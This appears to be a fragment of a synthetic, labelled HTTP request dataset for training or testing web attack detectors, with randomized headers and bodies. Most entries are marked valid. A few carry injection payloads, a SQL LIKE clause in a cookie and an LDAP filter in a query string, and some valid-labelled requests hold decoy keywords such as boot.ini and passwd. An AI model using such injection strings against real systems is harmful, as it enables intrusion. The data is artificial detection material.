nntaes2ienetbay=De2&mfaeemsdfeTio=549&YSNc6RW=oEySkGh&bVmI_o=4534279&noiarhtl=excrwajnm0thneoemh&cTg@=ntaCltalodAhaT&EaridkNozjbtt=rsi&1oHUv=ve0&e1csniogrul=71&QHesah0srrot=tHeenhlacezsztr8r&6ktmigEaIxoc6h=E&eritkna4i=a9JNCN@ctESf&IilsA=Hu&s6=Nal

End - Id: 32724
Start - Id: 26848
class: Valid
GET /aRt.png?sam6akHi5styledi45=505&pjbitc=sclyr&iJtrmxrO0peNda=5&asibr6=+%29vA-cti%29eibgsoundl&eeieddnCo=m0naaMedhles5rdimo&tTfii=0t13u HTTP/1.1
Host: www.OMSrsl.de:80
Connection: close
Accept: image/*, video/*, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=1686
Client-ip: 92.158.144.109
Cookie: dbI=3806;quorticoemr=09;dnodeXygrHXX=shAUb0urmsg;eojc=asrxlz9;lmsesg7wr=en;elas9l=sstveesg9zv z
Cookie2: $Version="375"
Date: Tue, 19 Jan 10 04:46:35 GMT
ETag: "kQ2DhIHtfA0kF3cW"
Expect: narnunp=svtEad
From: vteseoi@repl.biz
If-Modified-Since: Mon, 26 Apr 04 17:31:22 CET
If-Unmodified-Since: Wed, 26 Apr 06 12:43:54 CET
If-Match: *
If-None-Match: "Kl7OL_vM0L@HbWjE"
If-Range: Sat, 29 Apr 06 03:04:36 UTC
Max-Forwards: 2
MIME-Version: 8.4
Pragma: odekNthr='mt4degi2'
Proxy-Authorization: NTLM ZnVuc05kbGRnSGVudmF0YjdzYmhsbmVhYXFlbTFudHRvbGpibWxrbHpwdG1FZWk=
Authorization: NTLM aW90ZWlha3RvcnB6bmlhcGVWdGZtZVNIdGlUOXplZ250
Range: -6214
Referer: /Lnoii/1llW5s/doTtEtAN/tyhtetw.php4
TE: deflate,deflate,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/4.8 (compatible; eRa0SOt; Open BSD i586; ektweod7; eumiroEs)
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9604x4951
Via: 0.0 www.ethete.jpeg, rbto/5.8 226.59.207.90, 2.9 180.101.179.226
Transfer-Encoding: li1us; t8nj5=pghd2
Upgrade: advoos/2.4, 1dhv/7.1
Warning: 554 54.4.98.188 "zidgiksD7" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 162095
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26848
Start - Id: 16729
class: Valid
GET /mGydGbTei.dll?Ssfir0=Ni4Hh0%25kgsbA&ihes=tr%2Fed&aacrstioeelen=rt7and&rlrqn=rTfihnxnyql&rt7aei=hTBPqNWj9Ddx&sszi7crGErd=63&5c1=nFisfaduhshEq0a&j1de7pse6wugkyd=lioo6iHte&rdasofa=esrmlpr&tsiotSNott=08153&te0t=6enatftpeet+%3F%5Bpvautoexeclnxom HTTP/1.1
Host: 116.40.180.79
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.1
Cache-Control: max-stale=28
Client-ip: 104.169.22.34
Cookie: hoow=umzdzmZttttirr;ientrztoguIuhee=i6somd/;et=spw6Sip9a;d5qri=9
Cookie2: $Version="75"
Date: Mon, 11 Sep 06 11:32:37 GMT
ETag: "PKL-3Ymhj7vA_z3nW"
Expect: 100-continue
From: j9obsh@tsaam9a.fr
If-Modified-Since: Fri, 12 Mar 04 10:20:00 GMT
If-Unmodified-Since: Thu, 30 Jun 05 16:16:38 UTC
If-Match: "U9DF.jyta2l4buXL7ozx"
If-None-Match: *
If-Range: Mon, 29 Sep 08 16:59:40 UTC
Max-Forwards: 1856
MIME-Version: 5.2
Pragma: a=dsrmgw
Proxy-Authorization: Basic cmVEYmllajpIYWVkNGFpZA==
Authorization: Digest response="f6F95bE9D5b4904edeaDD768CA8FA0Bc"
Range: 308326-6486
Referer: http://www.THpT.gov/bnckDv/rrje/1tets/n468uehb.msf
TE: trailers,chunked
Trailer: If-Range
User-Agent: h3qVdU http://www.st4u5e.st
UA-CPU: x86
UA-Disp: 3273,598,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1249x2317
Via: 6.4 www.AGyZiSnt.tiff, HTTP/4.5 www.tdoerm.gif
Transfer-Encoding: identity
Upgrade: wsgnwl/0.0, 7nltw/5.0, 7ai/7.4, rhRh/3.3, eMvtpm/2.1
Warning: 082 www.cyawd.gif "ulhshseXosaHnh3a" "Wed, 29 Jun 05 18:19:58 CET"
X-Forwarded-For: 42.39.230.63
X-Serial-Number: 585140076554
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16729
Start - Id: 6266
class: Valid
POST /3pnrrl.png? HTTP/1.1
Content-Length: 284
Content-Language: s,nushg,gatiy
Content-Encoding: identity
Content-Location: /omvueao/dEdean/flxysg/4ht7/e2yea.php4
Content-MD5: dG1rZ3NycnRlUzBlYW9ldA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Mar 04 05:41:21 CET
Last-Modified: Sun, 01 Mar 09 03:10:26 GMT
Host: 71.156.17.53
Connection: keep-alive
Accept: image/jpeg;q=0.7, image/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=28185
Client-ip: 52.150.6.189
Cookie: idhBnulljY=40;eCl3enwb=36608840;lofzdtcao=lrip;ossgjt3aoA=hejvJ
Cookie2: $Version="947"
Date: Tue, 13 Oct 09 04:56:17 UTC
ETag: W/"Tk5zrrAfhUQaQqYj"
Expect: aEuade=aei7r;cowi
From: yder@cto6.com
If-Modified-Since: Fri, 19 Aug 05 02:26:02 GMT
If-Unmodified-Since: Fri, 26 Jun 09 20:25:37 GMT
If-Match: "h6HLriJV7yayaf-"
If-None-Match: "DNpQY74meWnmYM5_nHuO"
If-Range: *
Max-Forwards: 4227
MIME-Version: 1.5
Pragma: y='otWta'
Proxy-Authorization: Digest uri=http://www.zela.st/1WrnB/mtdtwe/iaqnyt/yrof/oSta1uHi.pdf
Authorization: Basic VW9zcWU6aWVobg==
Range: 31074-7605
Referer: /nq0txnpm.rar
TE: chunked;q=0.2
Trailer: Proxy-Authorization
User-Agent: hTsds0wGeeDEib
UA-CPU: 68000
UA-Disp: 9466,026,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6564x871
Via: FTP/8.4 www.yrsen.html, 5.4 www.k7taa.png, 3.7 www.audlaa.jpg:9
Transfer-Encoding: gzip
Upgrade: ra0Hnd/6.8, eyae/3.6, Irhtn/4.9, eltrm/8.5, ilhi/1.9
Warning: 097 84.156.203.77 "rilteriyvagst2t" 
X-Forwarded-For: 128.144.152.215
X-Serial-Number: 9542646613445
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

tJlhmioqn=aLQWU8XfKF&nizeiz=a0ya&aaedpcskw=ark&ruhsRcTq86ke=30375&D2nrm=71 umta@eleh0C&bxnryoawgg=hF5Wf@JGzE&ehsMrwsRod=udiaireotfwme&cdmaTE=tl]|+&8k6Hm=ogqyraltcnknse56&nhlcrNo=i6ddwoinsertioi&irrm=59316609&aiertueEtb=lidusmn&Ucle9ei54m=e1craietrse0haoThs&oor3got66a=hSQKHJ

End - Id: 6266
Start - Id: 34558
class: Valid
PUT /h.P/r4eOomoeyewrQol3/r36/te/mNLZJ117CnKowff0/3tuiesg2Tid89oehsyac/eiinNpi2oi2amopA0gvo/t9xdMm3miOPNFJKj/ia_O6sbZ_ykIqkZoI.htm? HTTP/1.0
Content-Length: 136
Content-Language: ysn,sgnt
Content-Encoding: compress
Content-Location: http://www.tdoted.org/bbba5l/rLqisvS/ot8tmedr.asmx
Content-MD5: ZW9maTNyZW96YXJueWg0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Dec 09 10:15:51 UTC
Last-Modified: Sun, 16 Dec 07 24:05:32 CET
Host: 197.10.101.134
Connection: mkhpy
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: mb7of-2dme
Cache-Control: max-stale
Client-ip: 71.183.190.111
Cookie: .pt0=87
Cookie2: $Version="566"
Date: Sun, 04 May 08 14:36:13 GMT
ETag: "gY1vMtzXVC4AuJDCwZH"
Expect: 100-continue
From: r4o9@ecoOy.ch
If-Modified-Since: Mon, 07 Sep 09 17:40:37 CET
If-Unmodified-Since: Wed, 01 Nov 06 02:19:37 CET
If-Match: "63Pq5KEjTGKQ-t4iz"
If-None-Match: *
If-Range: Mon, 22 Jun 09 16:39:34 UTC
Max-Forwards: 67
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM ZHN0ZWgydTBtYnRsUjhzZXhvbEtyaGR0Mm5ubm1ycm51cW1ldm5tb3Vpc21EbG9o
Authorization: Basic Y2duZGVjVXM6dGhpaQ==
Range: -4597,119988-57606
Referer: http://himsf.gov/oXrdada/oebin/asrto/xiItlcrr.jpeg
TE: trailers
Trailer: Host
User-Agent: ieiTweri (h5CUqWDU)
UA-CPU: Sparc
UA-Disp: 225,732,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 059x5664
Via: HTTP/7.4 www.nnIe5p.shtml, HTTP/9.6 www.trtrng5i.html
Transfer-Encoding: compress
Upgrade: tilnna/3.3
Warning: 572 93.181.174.70:9 "Nv99hl5yheexr" "Tue, 08 Jan 08 21:03:46 UTC"
X-Forwarded-For: 178.146.180.28
X-Serial-Number: 899542790
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

2szqre=196&sreirutk=08484&Neit=3&tFns=r20&rEE6telnetE_lyeQ=o2pdllowt&kRHi=homesawhereoan@i&n7kefesl4yeyrh=q8nEwqTF&Yu3gtaSofkurils=aEr

End - Id: 34558
Start - Id: 41295
class: SqlInjection
GET /NNCru4scatTwj78/koihlsxhwihg8u/tF-hPPj4GrIvfkpP/lscsIojgrbyhn/a0i/0xE/ogY1dy-XqnD@sahoSv-/zadsecac/iFCNDar/oK5/rthtotbn.pl?wyt6NeaaI=nD6q0rno+etc&snem5mifatnco=%2FE%28aam1+ErLdIvz&gt=1mbh&MlienseaO=ox5-oDWYl&2ep3=3945 HTTP/1.1
Host: 37.112.30.20
Connection: aiunea
Accept: application/x-tar, text/html;q=0.2, audio/basic;q=0.8
Accept-Charset: iso-8859-8;q=0.0, cp-932;q=0.4, windows-1251;q=0.0, x-mac-hebrew;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 136.100.0.212
Cookie: rrhn3=hlel8NnnlheGi6;lierapah=9medocument;sJb8lGa9qu=1951;wEkwDsd20e=255854338;pas6=OR    'n0s'     LIKE    'Sim%';nwDhd7isobItn=syimsabte
Cookie2: $Version="2"
Date: Mon, 09 Nov 09 24:59:44 UTC
ETag: W/"J_zX9NUn3DWK1nq"
Expect: 0r4vui=lsinnpa;beetllsd=y6tcn
From: 7jtnsEc@oHtbtu9a.biz
If-Modified-Since: Sun, 25 Jan 04 04:06:26 CET
If-Unmodified-Since: Tue, 13 Mar 07 05:21:13 GMT
If-Match: *
If-None-Match: "20ue-k_r5CYWR@T"
If-Range: Thu, 05 Feb 09 04:28:25 GMT
Max-Forwards: 06
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest cnonce="uzosd6"
Range: 1-,9-8
Referer: /4oreu/Dagr.tar.gz
TE: gzip;q=0.9
Trailer: Range
User-Agent: Mozilla/0.4 (Windows; U; Win98 2.4; 3p-in; rv:3.2.7) Gecko/42006260
UA-CPU: MIPS
UA-Disp: 8902,8291,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5654x046
Via: 1.9 www.eyib.js:36
Transfer-Encoding: gzip
Upgrade: hnebp/4.7, dlb/9.5, 3Rmd/1.9, ocalhm/1.7, ejae/1.4
Warning: 350 www.Sdw54r.shtml "dtdtp7mtttrwP" 
X-Forwarded-For: 0.5.238.60
X-Serial-Number: 99307036492325759306
----: --------------------------------------------------

null

End - Id: 41295
Start - Id: 32342
class: Valid
GET /B2oKCiJ9YqIoqS/puiHjK5/oe6o6eowAi/efdxBtqmlh_Q9unk/tfj1/laos4scnriseTm/auej5/M13homekINZv0tWS/hY/fedteotcsDdeathe6/gMip3ZplqbnKiSG.9.tiff?0Omboot.iniH_=pnfnat7d&0CRf=%7Etris9miGi-duadmint+ HTTP/1.0
Host: 128.191.131.72:13429
Connection: keep-alive
Accept: image/*
Accept-Charset: isiri-3342, gb2312, windows-1254
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 184.137.255.50
Cookie: 4lvhtsto=rg;Uxp8=998;msho=zXsne6ousny4E5eoi2;hMenfdrvlaAqst=ent6eweU;Ot=eLk5
Cookie2: $Version="156"
Date: Sun, 13 Nov 05 06:22:41 CET
ETag: W/".hu7yzt2QaRavCt39"
Expect: 100-continue
From: E8ie@bbNE.biz
If-Modified-Since: Thu, 02 Feb 06 22:21:38 CET
If-Unmodified-Since: Sat, 17 Jan 04 04:36:03 CET
If-Match: "rWIR_9YjajiyrWhz5VA"
If-None-Match: "mMitNRp3Pz237K5"
If-Range: Fri, 22 May 09 11:12:23 CET
Max-Forwards: 7
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic TjBsMjJlOklhc21oc3V3
Authorization: Basic anNvR21sbzp5ZXdlU2lhaQ==
Range: -604
Referer: http://www.imno.uk/rssriu/hpAlle8.cgi
TE: trailers
Trailer: Via
User-Agent: zertDN (t7s._8I9; eCULssy4)
UA-CPU: Sparc
UA-Disp: 7110,163,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 831x847
Via: HTTP/8.9 220.151.82.166, HTTP/9.3 90.106.192.32, 8.4 www.einl.shtml
Transfer-Encoding: gzip
Upgrade: eai0N0/8.3
Warning: 268 73.155.225.55 "tujat7tN1dsia" "Fri, 08 Oct 04 18:08:34 CET"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 5125463883
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32342
Start - Id: 26050
class: Valid
GET /rMzy3rjAL_g/access_log8sy7r/twdrfsddlateeVws/oW2Pz1Rzxd/aeitpitm8aed0leemsmy/hpvYmVz4Mx9jPojU/es5adrNcnmlngs/aruEudtmaIRlhNta/t5/53li8ahoslsha.php4?ml=aegrlaL2lelaszan&8Gt=ztnnps9+m%265a&ik=aye&IkltpasswdZJd7v=Oshutdowna&xp_Dllinkd3m0Rf=1356179 HTTP/1.1
Host: www.iaaetEn.org
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: deflate
Accept-Language: ttsxi-Eh;q=0.3, opmoae-sa6r3ot
Cache-Control: only-if-cached
Client-ip: 99.160.1.157
Cookie: LLssrn7atotxt1e=qloY$sendsnwheree;d7d=o7waqtS;2eodum2R=4507;mlrF1dtean4rti=3275634;hr2iotseUo=honu;gsmyteceM=9physlmwdennaue
Cookie2: $Version="875"
Date: Wed, 14 Nov 07 21:49:10 GMT
ETag: W/"LvVKcJV9LTc@6otu9"
Expect: Ipaae=loBUveeu
From: alLeiF@uTy8difar.biz
If-Modified-Since: Sat, 12 May 07 01:56:53 UTC
If-Unmodified-Since: Wed, 22 Oct 08 04:29:30 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 48
MIME-Version: 4.1
Pragma: zt6tsfhx=ttsaro
Proxy-Authorization: Digest username="mpdha"
Authorization: Digest response="4eC770eAb49CD05d256029637Ca42e4A"
Range: 077750-,-78409
Referer: /ru8vI/t38ob.php
TE: trailers
Trailer: Warning
User-Agent: rrniIA (e-zQMD; dAoX9HbYlo)
UA-CPU: StrongARM
UA-Disp: 889,8239,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 096x0326
Via: 6.0 249.172.182.130
Transfer-Encoding: deflate
Upgrade: 33tso/9.6
Warning: 573 248.81.173.161 "hSShBh8osar8mnn" "Thu, 15 Jun 06 19:23:51 CET"
X-Forwarded-For: 235.121.152.157
X-Serial-Number: 6743288486222977
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26050
Start - Id: 2230
class: Valid
GET /xp_MWunion5eYt.NdLi/vJtbBWEX-StP/eyn/evIiE/ta./tfini/ej0xU.css?inhktemrgrah=ueunon&_Bcb=2876&oRmnntnanntcN=5SJE8&c9he=ekamSoRl%3E%5Dr HTTP/1.0
Host: www.xeet.de
Connection: mb0d
Accept: audio/*;q=0.7, image/*;q=0.7
Accept-Charset: hz-gb-2312;q=0.0, windows-1251
Accept-Encoding: deflate;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 119.152.190.17
Cookie: 1DCvIVoptU1=1882
Cookie2: $Version="1"
Date: Sat, 11 Apr 09 17:52:45 UTC
ETag: "Uvy.yQT4V-x.0R@WV"
Expect: 100-continue
From: qihm@deseaahi.de
If-Modified-Since: Sat, 12 Feb 05 07:24:59 UTC
If-Unmodified-Since: Thu, 01 Jan 09 19:35:32 GMT
If-Match: "mTM@RPaiVZvy7krDROx"
If-None-Match: "AOeypsmbfmQldmYunpGv"
If-Range: *
Max-Forwards: 545
MIME-Version: 9.7
Pragma: t=aaiiogib
Proxy-Authorization: Digest response="4216772A5CecEFaA8c9aAfE01bB8C2cc"
Authorization: leeam ihhdoeon=ytpp
Range: -9799,98225-
Referer: http://www.xSnh1t.gov/hsrtf/no1mgrn/naehembD/qatipo.txt
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.8 (X11; U; Linux i586 5.4; 0w-eq; rv:8.7.5) Gecko/85746040
UA-CPU: PowerPC
UA-Disp: 006,895,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 709x4078
Via: daTr/9.9 www.mecTtt.js, HTTP/9.0 77.55.45.72, HTTP/2.6 71.70.38.164:54
Transfer-Encoding: deflate
Upgrade: 1pptr/8.7, nps/5.0, rwa/1.0
Warning: 986 22.139.28.204 "6desddaxYcZe9" 
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 92243859196
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2230
Start - Id: 38764
class: LdapInjection
GET /vLupdateu/rnuuienfet/pX8oPatpV/aRReOHE69v/OUgNFraP/a67Winclude.js?de3s5m=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ltrlEprsarote0e=28&y7wa=5 HTTP/1.0
Host: 198.63.32.110
Connection: jZiN
Accept: application/rtf;q=0.0
Accept-Charset: euc-tw;q=0.6
Accept-Encoding: deflate, deflate;q=0.7, deflate
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 134.201.148.112
Cookie: seame=rtnnoors;Iasgisrs0A6=nah1tsbrsrhciue;herau9tatww=11790850;nalrayuaAtakr=n
Cookie2: $Version="4"
Date: Sun, 25 Nov 07 07:13:45 GMT
ETag: W/"slBMokRXBctBPJw"
Expect: iwaga4ao=ehlt
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 30 Nov 04 10:10:50 CET
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: "04Jj6asrCLCUaQfynbO"
Max-Forwards: 7
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: NTLM c3JvdGV1M0UzZVJmMThtYXVBcGxlbmVUbjNOZGR4Zm9oc0Ewc2w=
Range: 7-
Referer: http://resniery.fr/epu5a/murw.jpeg
TE: trailers,gzip;q=0.1,trailers
Trailer: If-Match
User-Agent: ubetsrl (ui@E79; bIFJZcP; ey9WqMT0ln; rX_n-mf)
UA-CPU: Sparc
UA-Disp: 372,5525,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8698x991
Via: FTP/8.2 www.bsoflia.jpg, 5.4 www.eeags.png
Transfer-Encoding: gzip
Upgrade: qUr/2.7, rRt/2.0, b9eynm/6.6, RsT6/5.1
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 99237184639
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38764
Start - Id: 8245
class: Valid
GET /OePy/leknstep8rnu/Qghmc7de5isa3hebadu/aeoratassyacvsaEo/hScqukJYxqSXhS8l.htm?no1r8oiTpnbht=3480061&ltehA2wnb=c8tIyrlqsz&aaaxeftfneofc=3F%40NI8&eei6lo=qbchsuEsnLo6g33ijt&svrpqssDethh=essNiogwah&tos=27137360&mnwRvetoysmt=178976&tms=R0&e98fi2hfpOsadnt=6th HTTP/1.0
Host: www.tiEt.it
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-korean, ks_c_5601-1987;q=0.8
Accept-Encoding: gzip;q=0.6, gzip;q=0.9, identity;q=0.6, deflate;q=0.4
Accept-Language: c-i;q=0.2, hlilyj-FSmdSry;q=0.2, wrer9s-oo0srmEz
Cache-Control: no-cache
Client-ip: 168.48.0.49
Cookie: sTne= f6nF;hpdeletea=nph-5trO@sslsdlgroup by\zlink;wqL8r=si0a;ijuwesUqh5gt=88WF_g;roer9mnesel=9170306
Cookie2: $Version="9"
Date: Wed, 14 Nov 07 01:16:39 GMT
ETag: W/"hea.MfjvUK@lxe0biG"
Expect: esysg
From: seep8@iavee.it
If-Modified-Since: Thu, 16 Oct 08 20:40:39 CET
If-Unmodified-Since: Tue, 12 Jun 07 15:27:21 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Aug 09 21:55:14 GMT
Max-Forwards: 8
MIME-Version: 1.1
Pragma: o='jeoaw'
Proxy-Authorization: Basic ZWQ2M3Q6ZWlsYw==
Authorization: re6i beTyuwz=d8ce4ooe
Range: 62861-,40-66
Referer: /ethsUs/usdalknh/isetr.mpg
TE: trailers
Trailer: Referer
User-Agent: a.dmcE8AG http://www.anrtw.com
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5572x247
Via: 4.0 83.182.156.108:2073
Transfer-Encoding: imWIds; eIiwtme=tdtxwrh
Upgrade: rht7s7/2.6, dxceec/0.8, Fr2jv/6.2
Warning: 350 www.rvsnz.jpg "iihmtwbmshrEsre" "Tue, 20 May 08 02:04:29 UTC"
X-Forwarded-For: 91.90.224.106
X-Serial-Number: 9806136470509307613
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 8245
Start - Id: 31392
class: Valid
GET /pE/lfeiaer/e5w59nrhithrye/tgl_v/_ZGTZ4documentq0dKY/oKx/n15SLiMY3VZB/q@m/h@PS/m2kvBftpJtOL/aEGv@xr-ukKTmquCx_yg/mQfAPTAg__zXTVYZ.cfm?ezn8eso=9420510938&tsagt7=1ZDY&p0=pgAshrrligelld&iiEsnmRQ=ictw&3R5D9mwfrb9as2m=47&objectX1R=passthrusock_stream HTTP/1.0
Host: 234.202.50.5:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5;q=0.2
Accept-Encoding: identity, deflate;q=0.7, identity, identity;q=0.6
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 144.48.117.154
Cookie: eyo4ynortrfOrp=t
Cookie2: $Version="970"
Date: Fri, 19 Mar 04 04:17:39 UTC
ETag: W/"ogu5MqMSWXfdu5Wk"
Expect: ooso
From: Tzeuatea@eoges.de
If-Modified-Since: Tue, 17 Oct 06 17:43:52 UTC
If-Unmodified-Since: Fri, 09 Oct 09 08:01:58 UTC
If-Match: "os1C6.ntC5llh_JzVKMj"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM cnRobWJNaGVoaXJQb25zczFGc25hM2VuYW9zc2RPbGVkb3NubHRpYVRkTm8=
Authorization: uuE9 bttfta=1tc9sr
Range: -6182,52054-760058,9-
Referer: http://www.a7ts.uk/p5eD/mezyeei6/tCld9sfm/els7reIt/qpf4snsn.exe
TE: deflate,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/3.7 (compatible; Konqueror/0.8; SunOS sun4u; t1reartm3; eIssmdp)
UA-CPU: StrongARM
UA-Disp: 6015,3763,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2355x254
Via: 5.7 242.113.197.193, 0fzt/7.6 174.187.184.79
Transfer-Encoding: 7esh
Upgrade: ruexiD/5.5
Warning: 388 www.tfrat7d.jpeg:096 "hrsa7mrlleyurua" "Tue, 09 Mar 10 03:42:13 CET"
X-Forwarded-For: 30.188.197.35
X-Serial-Number: 178529
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31392
Start - Id: 4601
class: Valid
POST /nntd/42D@AeENc_/ichb/kEeCR51Ms/t5KdT103y/eR7jessg/u_qL/5lxL0bbxuQs4OTRD/4xEpjp8i3pncaetrsc.jpg? HTTP/1.1
Content-Length: 233
Content-Language: v6l,sor,o
Content-Encoding: compress
Content-Location: /tCtu/4i2n7f.js
Content-MD5: SWxpYWxlaDNldHJlb2xMZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Oct 06 04:29:18 GMT
Last-Modified: Mon, 11 Aug 08 04:25:53 GMT
Host: www.vnto.be
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-7;q=0.7
Accept-Encoding: gzip;q=0.1
Accept-Language: ho-sr, ma-H;q=0.4, 8cte5c-iohu;q=0.0, r4am-t15Eoe
Cache-Control: only-if-cached
Client-ip: 106.70.84.133
Cookie: stnsgiatsvp=3024099;ad=tyrYe;cbfbtoe5trae3x=adatswmyital7tre
Cookie2: $Version="7"
Date: Tue, 14 Feb 06 18:27:04 UTC
ETag: "sg@ihNTuVOy75ZcaHms"
Expect: aul2t=nesi
From: shme@uth2.org
If-Modified-Since: Sun, 06 Feb 05 14:37:43 GMT
If-Unmodified-Since: Sat, 20 Oct 07 05:33:39 CET
If-Match: "os6uoAnYzHHjtITY"
If-None-Match: "mm-XZTv-qExjrQtsJO"
If-Range: Fri, 04 Dec 09 17:40:25 GMT
Max-Forwards: 74
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM bHNleGV0cW9EMUZiZ2Vpb3ZydGVXS25zcXR5YXV4c29sc3NrbmlpaWFuZXduOA==
Range: -6763
Referer: http://www.hiAruts.st/amZ5n43e/hawaE/Epphwbal/ulnbstn.jsp
TE: trailers
Trailer: Range
User-Agent: tjxsdaatbeb
UA-CPU: StrongARM
UA-Disp: 456,796,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 2066x525
Via: HTTP/3.4 www.psrC.png
Transfer-Encoding: identity
Upgrade: veh/9.0, cojts/9.3, tnc/9.3
Warning: 848 215.17.207.198:27 "dhaswCc" "Tue, 17 Feb 09 02:45:11 CET"
X-Forwarded-For: 229.244.68.193
X-Serial-Number: 94988
----: -----------------
~~~~~: ~~~~~~~~~~~~

ft1nm11g1le99fa=l23n&aoiCU=97354&oplrd8hssdeWtxE=0701611&DRcCKt5R=5meanikunn&idtnDionheex14t=iteejelcsonIwa&zxd6.esJanwk=v8AzcoTvMni6&rt7y=0850733648&aq8y13s=o t artass&XGFQl=anaox ;sboot.iniqepntr&hd6ie=9&8OrEPadmin9GNposition=[

End - Id: 4601
Start - Id: 1977
class: Valid
GET /EiH8GLEfRM/hsLFrcUgoNQPRV/io/eDgdnt/1ACS6-/jIgsK95TBpC650a/t@1/ebKlPmlYESJS.cgi?adeh8=c9JeSminyaWc&lr7h=103706&i0oreesRoraael=c&ae=eRvKsWmP&sjonlaibeltc=sRtttelnet%3FD7nhniatg&mmerAuttb2=a6o%274&lndeinl3=njdP0oJ2&3nulmlsel=82 HTTP/1.0
Host: www.moaaboj.net:66093
Connection: lmhcnee
Accept: image/*, text/html
Accept-Charset: isiri-3342;q=0.3, x-mac-ce, iso-2022-kr;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: l='Aqrdiv'
Client-ip: 180.157.188.193
Cookie: mcbconnectuvoR=ho1Deedh71;de=6SrgCe6CK6vL;le=vbscript-ebrr]anghe/aaf;LKdiy=b;qSnndeWwcml=8341;she0awt8sm4tb=2949342
Cookie2: $Version="171"
Date: Sat, 06 Oct 07 20:36:20 UTC
ETag: W/"loREdCy5xhDOxRjDWjad"
Expect: 100-continue
From: ntlbbxru@destaueare.gov
If-Modified-Since: Tue, 17 Jul 07 12:18:09 GMT
If-Unmodified-Since: Wed, 02 Dec 09 22:22:12 UTC
If-Match: *
If-None-Match: "zPzmNDuqG80T7p4@XK"
If-Range: "RZD8-7q84L-E762G2f6s"
Max-Forwards: 07
MIME-Version: 6.0
Pragma: K='rtef'
Proxy-Authorization: Basic ZXRHQm1DOnRvc3NsZg==
Authorization: Basic ZWFtdHc6YmkzOGN0dA==
Range: 2470-886674,3-1
Referer: /ftaisPn/iEis4/Reeich/oSrtlLu.pl
TE: trailers
Trailer: Date
User-Agent: NzsoreIcje (hWAhu3WD; e1Hw6igxCz; eghq@jh; eTE41I1; tutAUGrE)
UA-CPU: Sparc
UA-Disp: 348,029,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 396x457
Via: 3.5 www.sawFsea.tiff
Transfer-Encoding: deflate
Upgrade: 7wfm/6.4, AeeTi/2.7
